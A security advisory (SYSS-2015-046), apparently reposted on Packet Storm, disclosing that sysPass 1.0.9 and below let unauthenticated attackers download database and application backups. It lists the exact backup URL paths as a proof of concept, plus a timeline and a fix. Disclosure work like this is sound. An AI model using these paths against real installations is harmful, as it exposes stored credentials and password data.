exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sysPass 1.0.9 Insecure Direct Object Reference

sysPass 1.0.9 Insecure Direct Object Reference
Posted Dec 7, 2015
Authored by Daniele Salaris | Site syss.de

sysPass versions 1.0.9 and below allow for system backups to be downloaded by an external attacker.

tags | exploit
SHA-256 | 3f4f1197fb6b356561f3a5d4c13b670af0b0739a649d539b75953ebc8ae7b8d5

sysPass 1.0.9 Insecure Direct Object Reference

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-046
Product: sysPass
Manufacturer: http://cygnux.org/
Affected Version(s): 1.0.9 and below
Tested Version(s): 1.0.9
Vulnerability Type: Insecure Direct Object References (CWE-932)
Exposure of Backup File to an Unauthorized Control
Sphere (CWE-530)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2015-06-10
Solution Date: 2015-10-26
Public Disclosure: 2015-12-07
CVE Reference: Not yet assigned
Author of Advisory: Daniele Salaris (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

sysPass is an web-based Password Manager written in PHP and Ajax with a
built-in multiuser environment.

The web application is prone to a security vulnerability that allows an
unauthorized attacker to download existing backup files containing
sensitive data.

The software manufacturer describes the web application as follows
(see [1]):

"sysPass is a web password manager written in PHP that allows the
password management in a centralized way and in a multiuser environment.
The main features are:

* HTML5 and Ajax based interface
* Password encryption with AES-256 CBC.
* Users and groups management.
* Advanced profiles management with 16 access levels.
* MySQL, OpenLDAP and Active Directory authentication.
* Activity alerts by email.
* Accounts change history.
* Accounts files management.
* Inline image preview.
* Multilanguage.
* Links to external Wiki.
* Portable backup.
* Action tracking and event log.
* One-step install process."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The backup functionality of the web-based password manager sysPass
creates the following two backup files that are stored within the
application's backup folder:

* sysPass_db.sql
* sysPass.tar.gz

The file sysPass_db.sql contains a full database dump and the file
sysPass.tar.gz contains all contents of the sysPass web application
folder.

An unauthorized attacker can simply download these two existing backup
files via the following URLs:

http(s)://<HOST>/backup/sysPass_db.sql
http(s)://<HOST>/backup/sysPass.tar.gz

Thus, an external attacker without valid user credentials can gain
unauthorized access to all configuration and application data of the
password manager sysPass. With access to this data, an attacker can
perform further attacks in order to recover user credentials of sysPass
users or to decrypt encrypted password information contained within the
database.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following URLs can be used to download existing backup files of the
password manager sysPass from an external attacker's perspective:

http(s)://<HOST>/backup/sysPass_db.sql
http(s)://<HOST>/backup/sysPass.tar.gz

For example:

http://syspass.org/demo/backup/sysPass_db.sql
http://syspass.org/demo/backup/sysPass.tar.gz

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The reported security vulnerabilities have been fixed in a new software
release. Update to the new software version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-06-08: Vulnerability discovered
2015-06-10: Vulnerability reported to manufacturer
2015-10-26: Release of new software version that addresses the reported
security issues. Discussed security fix with manufacturer.
2015-12-07: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Web site of sysPass - sysadmin password manager
http://wiki.syspass.org/en/start
[2] SySS Security Advisory SYSS-2015-046
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-046.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Daniele Salaris of the SySS GmbH.

E-Mail: disclosure (at) syss.de
Key fingerprint = E135 4E23 6091 A85C 9E14 577A 28DF B3A7 0A98 A9D4

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJWZTiTAAoJECjfs6cKmKnUhucP/3VqXYMAvJtSbbbHwsZyh0Td
T9LtezrGtZeZze4CAMcfJvUZO9/wiDbdDsaEAV2UXrYDvA8f9rXJleJGS0Zrggwx
ktKMN09N/GH0PohrPI4+JFFE6Eolmhlf5PkVRFU8X8Z9orqD8s8NqcHg8P4e5FJy
Dey/+SD9SlbH/ICjxlkjaGXOlCqSHT3mQqhALaKSwikUN3v/YlzVaYwGnUwsYsVt
arZTqKf6c2Sk8LAwZTWLbm6EB/FxuATObV+tblHd/KOcaDhmp0ykL8r1Mve/XQTw
NX3aH9yXoRcpHjCSFa6QK89d4dY4Pv9ejpyMATcYmbLa4hEMZ421cAkJuFobHiCg
MtlHXcVhNn7K+8ogxFk5EKyMEIRYUWqsmh6ZfW9F1qJ5jVezqjYdCmPdUeHlZ66u
Mk2ikWNu3IkSv0fQy0HVzEvzHlbgzWYvWVaLCVwwS9s4JZTDvKF9E+xAeK2iC9Ul
OOM1RgYcY57dFL7M6dY6OpMM8xapbJHtYjEC8ammfc9rhRIHQO4evBXGufs5vmc0
hWHIRLuF4rx0bja4qAbxK6l+7lWdgaPSHDOW7I2v+NUdjvPKcjndsAOB9FiK+jhI
+Q09ybOMLEzICOlo3VhRwyaEc7X+HZRdTEijU3piV6nxKyhiCI2AVuMRKjJyV3pc
tz8Q0g6YqzlFi8VnPgSV
=YMqY
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close